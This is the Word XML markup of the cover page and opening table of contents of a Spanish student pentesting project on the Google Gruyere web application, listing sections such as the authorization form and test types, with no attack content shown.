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7876768"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="5386AF67" w14:textId="4FFAC423" w:rsidR="00352926" w:rsidRDefault="00352926" w:rsidP="002B2909">
          <w:pPr>
            <w:ind w:left="1416" w:hanging="1416"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wpg">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7103EE16" wp14:editId="3ED1C2D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D7F09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2DA8AD" wp14:editId="42ACA92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546A" w:themeColor="text2"/>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D1AEE4" w14:textId="5844E5B4" w:rsidR="00352926" w:rsidRPr="00352926" w:rsidRDefault="00352926">
                                    <w:pPr>
                                      <w:pStyle w:val="Sinespaciado"/>
                                      <w:jc w:val="right"/>
                                      <w:rPr>
                                        <w:color w:val="44546A" w:themeColor="text2"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r w:rsidRPr="00352926">
                                      <w:rPr>
                                        <w:color w:val="44546A" w:themeColor="text2"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                      <w:t>Alesander Martinez Seijo</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:p w14:paraId="322F3965" w14:textId="54F1B2D7" w:rsidR="00352926" w:rsidRDefault="00000000" w:rsidP="00352926">
                                <w:pPr>
                                  <w:pStyle w:val="Sinespaciado"/>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35292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2DA8AD"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44546A" w:themeColor="text2"/>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D1AEE4" w14:textId="5844E5B4" w:rsidR="00352926" w:rsidRPr="00352926" w:rsidRDefault="00352926">
                              <w:pPr>
                                <w:pStyle w:val="Sinespaciado"/>
                                <w:jc w:val="right"/>
                                <w:rPr>
                                  <w:color w:val="44546A" w:themeColor="text2"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00352926">
                                <w:rPr>
                                  <w:color w:val="44546A" w:themeColor="text2"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>Alesander Martinez Seijo</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:p w14:paraId="322F3965" w14:textId="54F1B2D7" w:rsidR="00352926" w:rsidRDefault="00000000" w:rsidP="00352926">
                          <w:pPr>
                            <w:pStyle w:val="Sinespaciado"/>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35292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4E1E866" wp14:editId="199D89D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1D3FE" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926">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DCEA57E" w14:textId="70B2C957" w:rsidR="00352926" w:rsidRDefault="00910939">
                                    <w:pPr>
                                      <w:pStyle w:val="Sinespaciado"/>
                                      <w:jc w:val="right"/>
                                      <w:rPr>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="20"/>
                                        <w:szCs w:val="20"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="20"/>
                                        <w:szCs w:val="20"/>
                                      </w:rPr>
                                      <w:t>Proyecto de prueba de pentesting a la aplicación web Google Gruye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E1E866"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521D3FE" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926">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DCEA57E" w14:textId="70B2C957" w:rsidR="00352926" w:rsidRDefault="00910939">
                              <w:pPr>
                                <w:pStyle w:val="Sinespaciado"/>
                                <w:jc w:val="right"/>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                                <w:t>Proyecto de prueba de pentesting a la aplicación web Google Gruye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BDCF74" wp14:editId="4BCC608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A67E6" w14:textId="5D060740" w:rsidR="00352926"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68A9">
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="4472C4" w:themeColor="accent1"/>
                                        <w:sz w:val="64"/>
                                        <w:szCs w:val="64"/>
                                      </w:rPr>
                                      <w:t>Proyecto 1ª evaluación</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490F053" w14:textId="405B9ADC" w:rsidR="00352926" w:rsidRDefault="0035292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BDCF74"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E9A67E6" w14:textId="5D060740" w:rsidR="00352926"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68A9">
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="4472C4" w:themeColor="accent1"/>
                                  <w:sz w:val="64"/>
                                  <w:szCs w:val="64"/>
                                </w:rPr>
                                <w:t>Proyecto 1ª evaluación</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490F053" w14:textId="405B9ADC" w:rsidR="00352926" w:rsidRDefault="0035292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7D63565" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926">
          <w:r>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="30B72D98" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926"/>
        <w:p w14:paraId="4EA4721F" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926"/>
        <w:p w14:paraId="41283E1D" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926"/>
        <w:p w14:paraId="1E86C827" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926"/>
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
            <w:id w:val="-557013439"/>
            <w:docPartObj>
              <w:docPartGallery w:val="Table of Contents"/>
              <w:docPartUnique/>
            </w:docPartObj>
          </w:sdtPr>
          <w:sdtEndPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:sdtEndPr>
          <w:sdtContent>
            <w:p w14:paraId="1B30447B" w14:textId="03AF1935" w:rsidR="00352926" w:rsidRDefault="00352926">
              <w:pPr>
                <w:pStyle w:val="TtuloTDC"/>
              </w:pPr>
              <w:r>
                <w:t>Contenido</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="368B5E6E" w14:textId="0F0B1F8E" w:rsidR="00345EC4" w:rsidRDefault="00352926">
              <w:pPr>
                <w:pStyle w:val="TDC1"/>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:hyperlink w:anchor="_Toc128034123" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>1.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Introducción</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034123 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>4</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="1BB263C0" w14:textId="2249A568" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC1"/>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034124" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>2.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Documentación</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034124 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>10</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="25A982A9" w14:textId="2A267594" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034125" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>1-</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Introducción.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034125 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>10</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="730652ED" w14:textId="37697454" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034126" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>2-</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Descripción de la empresa</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034126 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>10</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="54A83D84" w14:textId="5E0957E3" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034127" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3-</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Planteamiento del problema</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034127 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>10</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="554CCEB0" w14:textId="31FBE6E4" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034128" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>4-</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Objetivo general</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034128 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>11</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="7EA218B1" w14:textId="2484E3E9" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034129" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>5-</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Formulario de autorización de pentesting.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034129 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>11</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="2B9A2794" w14:textId="5B8DEF13" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034130" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>6-</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Tipos de pruebas</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034130 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>12</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="53ED142F" w14:textId="35634978" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034131" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>7-</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Restricciones y conformidades</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034131 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>13</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="492C2A7D" w14:textId="41B978E3" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
